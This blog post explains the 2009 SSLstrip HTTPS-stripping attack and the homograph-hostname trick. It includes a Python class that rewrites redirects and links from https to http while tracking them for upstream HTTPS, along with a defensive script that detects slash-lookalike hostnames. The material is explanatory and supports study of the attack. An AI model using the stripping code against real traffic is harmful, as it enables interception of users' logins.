Monday

SSLstrip tool and the HTTPS stripping attack from Blackhat DC 2009



The talk from Blackhat DC 2009 that got the most media coverage was probably "New techniques for defeating SSL/TLS" by Moxie Marlinspike.

If you want a good, detailed breakdown of the talk, I suggest Dan Kaminsky's post on doxpara.com.

Summarised: it combines forced redirections (every https:// link and redirect the real server sends is rewritten to http:// before it reaches the victim, while the man-in-the-middle proxy keeps talking HTTPS to the real site), "secure UI" simulation (a padlock favicon so the page still looks encrypted) and a smart homograph trick which makes the final attacker-controlled page look identical to, and as secure as, the original.
The underlying problem is that mixing HTTPS pages with HTTP was never a good idea. Users almost never type https:// themselves: they arrive over plain HTTP and rely on a link or a redirect to take them to the secure page, and that hand-over is exactly what a man in the middle can rewrite. LinkedIn is the first example that springs to mind. And it isn't just a theoretical attack. From The Register:

To prove his point, he [Marlinspike] ran sslstrip on a server hosting a Tor anonymous browsing network. During a 24-hour period, he harvested 254 passwords from users visiting sites including Yahoo, Gmail, Ticketmaster, PayPal, and LinkedIn. The users were fooled even though SSLstrip wasn’t using the proxy feature that tricks them into believing they were at a secure site. Sadly, the Tor users entered passwords even though the addresses in their address bars didn’t display the crucial “https.”
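The rewriting step described above, as an added example that is not sslstrip's own code: a small Python class that downgrades the Location header and every https:// link in a response body, remembers which (host, path) pairs it downgraded, and upgrades the victim's later requests to those pairs back to HTTPS on the way to the real server. The host names, headers and HTML are constructed for the example; the regex and the "remember what you stripped" bookkeeping are the core idea, not a drop-in proxy.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: what a bank's front page might send back over plain HTTP.
# The host names are fictitious (.test); no real traffic is involved.
SAMPLE_HEADERS = {
    "Location": "https://www.example-bank.test/login",
    "Content-Type": "text/html",
}
SAMPLE_BODY = (
    b'<a href="https://www.example-bank.test/login">Sign in</a>\n'
    b'<form action="https://www.example-bank.test/auth">...</form>\n'
    b'<a href="http://news.example.test/">news</a>\n'
)

# Any https:// URL up to whitespace or a quote / tag delimiter.
HTTPS_URL = re.compile(rb'https://[^\s"\'<>]+')


class Stripper:
    """Rewrite server responses so the victim only ever sees http://, and
    remember which URLs were downgraded so the proxy can fetch them over
    HTTPS on the victim's behalf."""

    def __init__(self):
        # (host, path) pairs the victim now believes are plain HTTP
        self.stripped = set()

    def strip_url(self, url: str) -> str:
        if not url.startswith("https://"):
            return url
        parts = urlsplit(url)
        self.stripped.add((parts.hostname, parts.path or "/"))
        return "http://" + url[len("https://"):]

    def strip_headers(self, headers: dict) -> dict:
        """Downgrade redirects: a 302 to https://... becomes a 302 to http://..."""
        return {
            k: (self.strip_url(v) if k.lower() == "location" else v)
            for k, v in headers.items()
        }

    def strip_body(self, body: bytes) -> bytes:
        """Downgrade every https:// link and form action in the HTML."""
        return HTTPS_URL.sub(
            lambda m: self.strip_url(m.group(0).decode("utf-8", "replace")).encode("utf-8"),
            body,
        )

    def upstream_url(self, host: str, path: str) -> str:
        """Where the proxy really sends the victim's next request: HTTPS if
        the victim only has http:// because we stripped it, else unchanged."""
        scheme = "https" if (host, path) in self.stripped else "http"
        return f"{scheme}://{host}{path}"


def run_demo():
    """Strip the constructed response, then resolve the victim's follow-up clicks."""
    s = Stripper()
    headers = s.strip_headers(SAMPLE_HEADERS)
    body = s.strip_body(SAMPLE_BODY)
    login = s.upstream_url("www.example-bank.test", "/login")  # was stripped
    auth = s.upstream_url("www.example-bank.test", "/auth")    # was stripped
    news = s.upstream_url("news.example.test", "/")            # was plain http
    return headers, body, login, auth, news


if __name__ == "__main__":
    h, b, *targets = run_demo()
    print(h["Location"])
    print(b.decode())
    print(targets)
```

The victim's browser never sees a certificate, so there is no warning to click through; the only signal left is the missing "https" in the address bar, which is exactly what the Tor users quoted above ignored.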

So using the homograph trick, you can be looking at a "secure" page whose address (in the location bar) reads https://www.paypal.com╱login╱abcdef.xyz123.cn. It appears to be a legitimate PayPal login page, but in reality it is phishing bait served from the attacker's xyz123.cn Chinese domain: that is the only registered domain in the name, and everything before it is just a subdomain the attacker controls, so the attacker can obtain a perfectly valid certificate for it and the browser shows a genuine padlock. The "╱" character is not a true slash but a different Unicode character that looks like one (a homograph of a slash) and is valid inside an IDN label, so the whole thing is a syntactically legal hostname. Browsers that refuse to render such an IDN label fall back to its xn-- Punycode form, which gives the game away; browsers that render it do not. Scary, isn't it?
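An added example (not from the talk or the post) showing why the name above works: it splits the hostname into DNS labels, reports the registrable domain, computes what a human reads if the slash lookalike were a real "/", and produces the xn-- (Punycode) form a browser would display if it declined to render the IDN label. The set of slash lookalikes is a constructed, non-exhaustive list, and the registrable-domain logic is a deliberate simplification that assumes a one-label public suffix such as .cn.

```python
import unicodedata

# Characters that look like "/" but are ordinary letters as far as DNS/IDN is
# concerned. Constructed illustration, not an exhaustive list.
SLASH_LOOKALIKES = {
    "\u2044",  # FRACTION SLASH
    "\u2215",  # DIVISION SLASH
    "\u2571",  # BOX DRAWINGS LIGHT DIAGONAL UPPER RIGHT TO LOWER LEFT (the one in the text above)
    "\uff0f",  # FULLWIDTH SOLIDUS
}

# The hostname from the post, spelled out so the lookalike is unambiguous.
EVIL_HOST = "www.paypal.com\u2571login\u2571abcdef.xyz123.cn"


def to_ace(label: str) -> str:
    """ASCII-compatible encoding of one label: xn-- plus Punycode, which is
    what a browser shows when it refuses to render an IDN label."""
    if label.isascii():
        return label
    return "xn--" + label.encode("punycode").decode("ascii")


def registrable_domain(hostname: str) -> str:
    """Naive registrable domain: the last two labels. Assumption: a one-label
    public suffix (.cn, .com); multi-label suffixes such as co.uk are not handled."""
    return ".".join(hostname.split(".")[-2:])


def apparent_host(hostname: str) -> str:
    """What a human reads: treat every slash lookalike as a real '/' and take
    the part before the first one as 'the site'."""
    for ch in SLASH_LOOKALIKES:
        hostname = hostname.replace(ch, "/")
    return hostname.split("/", 1)[0]


def analyze(hostname: str) -> dict:
    """Compare what the name looks like with what it actually is."""
    labels = hostname.split(".")
    lookalikes = [
        (ch, unicodedata.name(ch, "UNKNOWN"))
        for ch in hostname
        if ch in SLASH_LOOKALIKES
    ]
    seen = apparent_host(hostname)
    real = registrable_domain(hostname)
    return {
        "labels": labels,
        "ace_hostname": ".".join(to_ace(label) for label in labels),
        "registrable_domain": real,
        "apparent_host": seen,
        "lookalikes": lookalikes,
        # Deceptive when a lookalike is present and the site a human reads
        # belongs to a different registrable domain than the real one.
        "deceptive": bool(lookalikes) and registrable_domain(seen) != real,
    }


if __name__ == "__main__":
    for host in (EVIL_HOST, "www.paypal.com"):
        for key, value in analyze(host).items():
            print(f"{key:>18}: {value}")
        print()
```

Running it on the post's hostname shows the reader's eye landing on www.paypal.com while the DNS label that actually matters is xyz123.cn, and the ACE form exposes the third label as an xn-- label rather than a path.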

Have a look at the original presentation slides and the video of the talk.

There aren't many countermeasures against this attack. Some are asking for more EV certificates. Moxie says to encrypt everything, so that there is no HTTP-to-HTTPS hand-over left to strip. As an end user, you can use NoScript's option to force HTTPS for selected sites, which makes the browser request https:// even when the page or the redirect it was handed says http://. These can all help to better secure our traffic, but there isn't a "one size fits all" solution. (What later addressed this at the protocol level is HTTP Strict Transport Security, RFC 6797: essentially that NoScript rule, sent by the server itself, and still useless on a first visit unless the site is in the browser's preload list.)

Since this evening, his tool sslstrip is available directly from his website.

To finish this post, a last bonus: an interview with Dark Tangent and Moxie Marlinspike (warning: the audio isn't that good).

(Photo under creative commons from bpedro's photostream)
